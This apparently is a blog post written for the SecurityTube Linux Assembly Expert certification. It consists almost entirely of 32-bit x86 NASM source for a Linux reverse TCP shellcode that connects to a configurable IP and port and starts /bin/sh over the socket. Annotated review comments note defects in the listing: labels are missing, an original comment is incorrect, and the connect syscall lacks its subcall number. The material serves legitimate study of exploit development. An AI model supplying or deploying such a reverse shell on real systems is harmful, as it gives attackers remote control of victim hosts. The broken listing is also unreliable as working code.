Now to create a reasonably well-optimized Linux reverse TCP shellcode (66 bytes):

“\x7f\x00\x00\x01” <- IP address
“\x0d\xf0” <- Port 3568

; Title Linux Reverse Shell TCP Shellcode v0.1
; Author npn
; License
; Legitimate use and research only
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of

global _start

section .text

; Analysis notes (review): 32-bit Linux, i386 syscall ABI (int 0x80), NASM syntax.
; Register roles as the listing stands:
;   ebx = socketcall subcall number, then the socket fd (after the xchg below)
;   ecx = pointer to the current syscall argument array; also the dup2 target-fd counter
;   edx = 0 for the whole sequence (zeroed by mul below, never written again)
;   al  = syscall number (the upper bytes of eax are relied on being zero)
; Syscall chain as listed: socketcall(SYS_SOCKET) -> dup2 loop -> socketcall -> execve.
; NOTE(review): `global _start` is declared but no `_start:` label appears in this
; listing, and the `dup2` label targeted by `jns` below is not defined here; the
; listing may be truncated or reordered.

xor ebx, ebx	; ebx = 0
mul ebx		; edx:eax = eax * 0  ->  eax = 0 and edx = 0
push edx	; protocol = 0
inc ebx		; ebx = 1 = SYS_SOCKET (socketcall subcall)
push ebx	; type = 1 (SOCK_STREAM)
push byte 0x2	; domain = 2 (AF_INET)
mov ecx, esp	; ecx -> args array {2, 1, 0}
mov al, 0x66	; eax = 102 = socketcall
int 0x80	; socket(AF_INET, SOCK_STREAM, 0); eax = fd on success

xchg ebx, eax 	; ebx = socket fd, eax = 1 (old ebx). NOTE(review): the original
		; comment said eax = 2, which does not follow from the code above
pop ecx 	; ecx = 2 (the AF_INET value pushed above)

; sockaddr_in built on the stack (pushed in reverse field order)
push 0x0100007f		; sin_addr = 127.0.0.1 as a little-endian immediate; the
			; author's note indicates this is the field meant to be changed
push word 0xf00d	; sin_port = 0x0df0 = 3568 in network byte order
push word cx		; sin_family = 2 (AF_INET), reusing ecx

	; dup2(fd, n) for n = 2, 1, 0: redirects stdin/stdout/stderr to the socket.
	; NOTE(review): `dup2` (the loop target) is not a label in this listing.
	mov al, 0x3f	; eax = 63 = dup2 (eax upper bytes assumed zero here)
	int 0x80	; dup2(ebx = fd, ecx = n)
	dec ecx
	jns dup2	; repeat while ecx >= 0

; socketcall argument array for the connect() step
mov ecx, esp		; ecx -> sockaddr_in built above
push byte 0x10		; addrlen = 16 = sizeof(struct sockaddr_in)
push ecx		; &sockaddr_in
push ebx		; socket fd
mov ecx, esp		; ecx -> args array {fd, &addr, 16}
mov al, 0x66		; eax = 102 = socketcall. NOTE(review): ebx still holds the fd
			; from the xchg above; no subcall number is set in the visible code
int 0x80

; execve("//bin/sh", NULL, NULL)
push edx	; NUL terminator for the path string (edx still 0 from mul above)
push 0x68732f6e	; "n/sh"
push 0x69622f2f	; "//bi"  -> the stack now holds "//bin/sh\0"
xor ecx, ecx	; argv = NULL
mov ebx, esp	; ebx -> "//bin/sh"
mov al, 0xb	; eax = 11 = execve; edx = 0 serves as envp
int 0x80

This blog post has been created to complete the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: SLAE-158